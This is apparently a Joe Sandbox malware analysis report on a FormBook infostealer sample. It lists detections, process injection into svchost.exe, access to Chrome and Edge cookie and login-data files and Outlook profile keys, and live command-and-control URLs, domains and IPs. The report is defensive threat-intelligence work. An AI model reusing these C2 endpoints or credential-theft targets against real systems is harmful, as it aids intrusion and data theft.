                Source: BLv4mI7zzY.exe, XNNdkVYUhBbatb.exe, 00000005.00000000.2541993360.0000000001381000.00000002.00000001.00040000.00000000.sdmp, XNNdkVYUhBbatb.exe, 00000005.00000002.3365083191.0000000001380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: XNNdkVYUhBbatb.exe, 00000005.00000000.2541993360.0000000001381000.00000002.00000001.00040000.00000000.sdmp, XNNdkVYUhBbatb.exe, 00000005.00000002.3365083191.0000000001380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: XNNdkVYUhBbatb.exe, 00000005.00000000.2541993360.0000000001381000.00000002.00000001.00040000.00000000.sdmp, XNNdkVYUhBbatb.exe, 00000005.00000002.3365083191.0000000001380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0045862B cpuid 0_2_0045862B
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00464E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00464E87
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00471E06 GetUserNameW,0_2_00471E06
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00463F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00463F3A
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004349A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004349A0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2644936328.0000000007FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3365143129.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2622644598.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3359125714.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3365172560.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3365128938.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3365692561.0000000002A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2625771616.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: BLv4mI7zzY.exeBinary or memory string: WIN_81
                Source: BLv4mI7zzY.exeBinary or memory string: WIN_XP
                Source: BLv4mI7zzY.exeBinary or memory string: WIN_XPe
                Source: BLv4mI7zzY.exeBinary or memory string: WIN_VISTA
                Source: BLv4mI7zzY.exeBinary or memory string: WIN_7
                Source: BLv4mI7zzY.exeBinary or memory string: WIN_8
                Source: BLv4mI7zzY.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2644936328.0000000007FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3365143129.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2622644598.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3359125714.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3365172560.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3365128938.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3365692561.0000000002A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2625771616.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004A6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_004A6283
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004A6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_004A6747
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                2
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets151
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588799 Sample: BLv4mI7zzY.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 31 www.l54354.xyz 2->31 33 www.shopphere.store 2->33 35 5 other IPs or domains 2->35 39 Suricata IDS alerts for network traffic 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 Yara detected FormBook 2->43 47 3 other signatures 2->47 10 BLv4mI7zzY.exe 2 2->10         started        signatures3 45 Performs DNS queries to domains with low reputation 31->45 process4 signatures5 57 Binary is likely a compiled AutoIt script file 10->57 59 Writes to foreign memory regions 10->59 61 Maps a DLL or memory area into another process 10->61 63 Switches to a custom stack to bypass stack traces 10->63 13 svchost.exe 10->13         started        process6 signatures7 65 Maps a DLL or memory area into another process 13->65 16 XNNdkVYUhBbatb.exe 13->16 injected process8 dnsIp9 25 www.shopphere.store 209.74.79.40, 53771, 53772, 53774 MULTIBAND-NEWHOPEUS United States 16->25 27 www.l54354.xyz 162.218.30.235, 53765, 80 ANT-CLOUDUS United States 16->27 29 dns.ladipage.com 13.228.81.39, 53767, 53768, 53769 AMAZON-02US United States 16->29 37 Found direct / indirect Syscall (likely to bypass EDR) 16->37 20 RMActivate_ssp_isv.exe 13 16->20         started        signatures10 process11 signatures12 49 Tries to steal Mail credentials (via file / registry access) 20->49 51 Tries to harvest and steal browser information (history, passwords, etc) 20->51 53 Modifies the context of a thread in another process (thread injection) 20->53 55 2 other signatures 20->55 23 firefox.exe 20->23         started        process13

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                BLv4mI7zzY.exe57%VirustotalBrowse
                BLv4mI7zzY.exe63%ReversingLabsWin32.Worm.DorkBot
                BLv4mI7zzY.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.sharefree88k24.click/iz19/?pLNPctn=UssFuDgs3yWnyhEQP3EfYsAhRMCH7zgrCGcgkyD6ajj4AvMHk5wjtqALVi5dIoOJqD+HUHGBnnVErrmet4uT5RoiUvX8LNA/Wgeh3xkS0BPrPIhQ4lBFRDGS5W/EZ42X8WJqP+8=&yL=ohjXjzZp0vl40%Avira URL Cloudsafe
                http://www.l54354.xyz/jq20/?pLNPctn=Y1tg4+SOL5eE+AycCXTvziB71yBrg1O91RsaYXN25C6htIJcZWWT4ijvmmdbSmKvee6IP68K4FvBkloeJ7ydTRz05iBunvLV+SpSL2s6yDyPdWIOZH0K/EFLjzJIDWXT1oCQnJs=&yL=ohjXjzZp0vl40%Avira URL Cloudsafe
                https://la.ladipage.com/0%Avira URL Cloudsafe
                http://www.shopphere.store0%Avira URL Cloudsafe
                https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=68383/jq20/0%Avira URL Cloudsafe
                https://wx.longwaysun.com/app/register.php?site_id=2239&topId=68383/jq20/0%Avira URL Cloudsafe
                http://www.shopphere.store/bq63/0%Avira URL Cloudsafe
                http://www.sharefree88k24.click/iz19/0%Avira URL Cloudsafe
                https://fburl.com0%Avira URL Cloudsafe
                https://api.forms.ladipage.com/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                dns.ladipage.com
                13.228.81.39
                truefalse
                  high
                  www.l54354.xyz
                  162.218.30.235
                  truetrue
                    unknown
                    www.shopphere.store
                    209.74.79.40
                    truetrue
                      unknown
                      www.odvfr.info
                      47.254.140.255
                      truetrue
                        unknown
                        www.valdevez.net
                        unknown
                        unknownfalse
                          unknown
                          www.sharefree88k24.click
                          unknown
                          unknownfalse
                            unknown
                            www.tizzles.tech
                            unknown
                            unknownfalse
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              http://www.sharefree88k24.click/iz19/?pLNPctn=UssFuDgs3yWnyhEQP3EfYsAhRMCH7zgrCGcgkyD6ajj4AvMHk5wjtqALVi5dIoOJqD+HUHGBnnVErrmet4uT5RoiUvX8LNA/Wgeh3xkS0BPrPIhQ4lBFRDGS5W/EZ42X8WJqP+8=&yL=ohjXjzZp0vl4true
                              • Avira URL Cloud: safe
                              unknown
                              http://www.l54354.xyz/jq20/?pLNPctn=Y1tg4+SOL5eE+AycCXTvziB71yBrg1O91RsaYXN25C6htIJcZWWT4ijvmmdbSmKvee6IP68K4FvBkloeJ7ydTRz05iBunvLV+SpSL2s6yDyPdWIOZH0K/EFLjzJIDWXT1oCQnJs=&yL=ohjXjzZp0vl4true
                              • Avira URL Cloud: safe
                              unknown
                              http://www.sharefree88k24.click/iz19/true
                              • Avira URL Cloud: safe
                              unknown
                              http://www.shopphere.store/bq63/true
                              • Avira URL Cloud: safe
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://duckduckgo.com/chrome_newtabRMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/ac/?q=RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://optimize.google.comXNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpfalse
                                    high
                                    https://la.ladipage.com/XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://w.ladicdn.com/XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpfalse
                                      high
                                      https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=68383/jq20/XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.0000000005FA4000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.00000000038B4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2922696805.000000001FE94000.00000004.80000000.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.googleanalytics.comXNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://www.ecosia.org/newtab/RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://ac.ecosia.org/autocomplete?q=RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://www.googleoptimize.comXNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  high
                                                  http://www.shopphere.storeXNNdkVYUhBbatb.exe, 00000005.00000002.3365143129.0000000002831000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://api.forms.ladipage.com/XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://w.ladicdn.com/v2/source/html5shiv.min.js?v=1569310222693XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3367593533.0000000005F60000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    high
                                                    https://td.doubleclick.netXNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                      high
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://wx.longwaysun.com/app/register.php?site_id=2239&topId=68383/jq20/XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.0000000005FA4000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.00000000038B4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2922696805.000000001FE94000.00000004.80000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://fburl.comXNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://w.ladicdn.com/v2/source/respond.min.js?v=1569310222693XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3367593533.0000000005F60000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                          high
                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            209.74.79.40
                                                            www.shopphere.storeUnited States
                                                            31744MULTIBAND-NEWHOPEUStrue
                                                            13.228.81.39
                                                            dns.ladipage.comUnited States
                                                            16509AMAZON-02USfalse
                                                            162.218.30.235
                                                            www.l54354.xyzUnited States
                                                            62587ANT-CLOUDUStrue
                                                            Joe Sandbox version:42.0.0 Malachite
                                                            Analysis ID:1588799
                                                            Start date and time:2025-01-11 05:37:53 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 8m 26s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:8
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:1
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:BLv4mI7zzY.exe
                                                            renamed because original name is a hash value
                                                            Original Sample Name:54b7de7fe1e5480be40821947816c7abbc49dcc98a307f8fb961405aa58b15c5.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@7/3@6/3
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:
                                                            • Successful, ratio: 91%
                                                            • Number of executed functions: 48
                                                            • Number of non-executed functions: 278
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            TimeTypeDescription
                                                            23:40:10API Interceptor450387x Sleep call for process: RMActivate_ssp_isv.exe modified
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            209.74.79.40SLq0ulC3Wf.exeGet hashmaliciousFormBookBrowse
                                                            • www.futurexz.xyz/bhaz/
                                                            gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                            • www.unlimitu.website/bhgd/
                                                            rQuotation.exeGet hashmaliciousFormBookBrowse
                                                            • www.yous.website/sd58/?4v7=qfAN8teQqWHl0pB75/wJ4PX285H5E3s25CgjwOd4PKd8zFqJMRX78aaJW2P6tpRkk2pp9lWkT1iA/dTcpEbuyLhsAas7SiW6kXoDkzQ8RaPJjUuFvtCyEK8=&pRel=chN0
                                                            PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                            • www.unlimitu.website/b4eq/
                                                            CJE003889.exeGet hashmaliciousFormBookBrowse
                                                            • www.balanpoint.life/0cbv/
                                                            13.228.81.39SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                                                            • www.muasamgiare.click/dc08/
                                                            5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                            • www.taxiquynhonnew.click/y49d/
                                                            EIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                            • www.muasamgiare.click/dc08/
                                                            KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                            • www.erexolsk.shop/e69q/?SDC=Ihe54J8FxOdLpDLvAVmEpnE90Z1v01c1zwkBMMYSe/+kPN842+xeNKH4+BVPm4ZLCnayEF9DpIt9hcAcqJy+Rof05i4/0bkcF0VebTYcrL7tp/059g==&mH=CpePy0P
                                                            Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                            • www.sonixingenuine.shop/01c7/
                                                            ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                            • www.muasamgiare.click/bsye/
                                                            CJE003889.exeGet hashmaliciousFormBookBrowse
                                                            • www.erexolsk.shop/jh0k/
                                                            MAERSK LINE SHIPPING DOC_4253.exeGet hashmaliciousFormBookBrowse
                                                            • www.taxiquynhonnew.click/y49d/
                                                            QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                            • www.muasamgiare.click/dc08/
                                                            XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.taxiquynhonnew.click/y49d/
                                                            162.218.30.235k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                            • www.l03678.xyz/798t/?cNPH=yTUzEcgndw7KboVFHT9arl6MXaU44mjtDVZL03kfN2SLXi32Rry3GMticKdTmzUGS/LvnIcIaX/Cuqcp6D2L1KHgDhjkH8i+BogGG+P5HmtoXOiMf53XRo99vMLso5GtXZXy7Rd2RFdT&EtJTX=_JVX4ryxDRQpLJF
                                                            XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                            • www.l03678.xyz/798t/?9F=yTUzEcgndw7KboVFHT9arl6MXaU44mjtDVZL03kfN2SLXi32Rry3GMticKdTmzUGS/LvnIcIaX/Cuqcp6D2L1KHgDhjkH8i+BogGG+P5HmtoXOiMf53XRo99vMLso5GtXZXy7Rd2RFdT&wtE0B=1LjxZz
                                                            z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                            • www.l40175.xyz/9wie/
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            dns.ladipage.comBalphRTkPS.exeGet hashmaliciousFormBookBrowse
                                                            • 18.139.62.226
                                                            SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                                                            • 13.228.81.39
                                                            5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                            • 13.228.81.39
                                                            0Wu31IhwGO.exeGet hashmaliciousFormBookBrowse
                                                            • 18.139.62.226
                                                            NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                            • 18.139.62.226
                                                            EIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                            • 13.228.81.39
                                                            bkTW1FbgHN.exeGet hashmaliciousFormBookBrowse
                                                            • 18.139.62.226
                                                            KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                            • 13.228.81.39
                                                            Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                            • 13.228.81.39
                                                            ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                            • 13.228.81.39
                                                            www.odvfr.infoNWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                            • 47.254.140.255
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            AMAZON-02US4.elfGet hashmaliciousUnknownBrowse
                                                            • 18.131.143.241
                                                            ydJaT4b5N8.exeGet hashmaliciousFormBookBrowse
                                                            • 13.248.169.48
                                                            BalphRTkPS.exeGet hashmaliciousFormBookBrowse
                                                            • 18.139.62.226
                                                            n2pGr8w21V.exeGet hashmaliciousFormBookBrowse
                                                            • 13.248.169.48
                                                            PGK60fNNCZ.exeGet hashmaliciousFormBookBrowse
                                                            • 13.248.169.48
                                                            02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 76.223.54.146
                                                            zAg7xx1vKI.exeGet hashmaliciousFormBookBrowse
                                                            • 13.248.169.48
                                                            1SxKeB4u0c.exeGet hashmaliciousFormBookBrowse
                                                            • 18.141.10.107
                                                            SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                                                            • 13.228.81.39
                                                            suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                            • 13.248.169.48
                                                            ANT-CLOUDUSk9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                            • 162.218.30.235
                                                            XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                            • 162.218.30.235
                                                            z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                            • 162.218.30.235
                                                            http://www.bit-chasers.com/Get hashmaliciousUnknownBrowse
                                                            • 154.83.27.206
                                                            http://manilaministop.comGet hashmaliciousUnknownBrowse
                                                            • 154.83.24.123
                                                            http://njanow.com/Get hashmaliciousUnknownBrowse
                                                            • 154.83.25.141
                                                            http://www.iyogiblog.comGet hashmaliciousUnknownBrowse
                                                            • 154.83.24.118
                                                            NOA_CMACGM_Notice_of_Arrival_ONEGO_BORA_0JH0JR1MA_1661088550291R021206.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 154.83.27.102
